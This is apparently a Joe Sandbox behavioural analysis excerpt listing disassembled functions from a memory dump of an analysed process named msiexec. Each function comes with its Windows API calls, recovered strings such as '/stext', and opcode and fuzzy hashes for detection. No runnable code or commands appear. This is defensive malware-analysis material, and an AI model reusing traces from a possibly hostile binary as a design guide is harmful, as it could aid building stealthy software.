                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                          Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3056473165-0
                                                                                                                                                                                                          • Opcode ID: a23d2a939ad00af3b28f9ed5364f909f34e6d2834532e54aeef847f11c675e41
                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a23d2a939ad00af3b28f9ed5364f909f34e6d2834532e54aeef847f11c675e41
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2445788494-0
                                                                                                                                                                                                          • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1381354015-0
                                                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                          Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                          • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2154303073-0
                                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
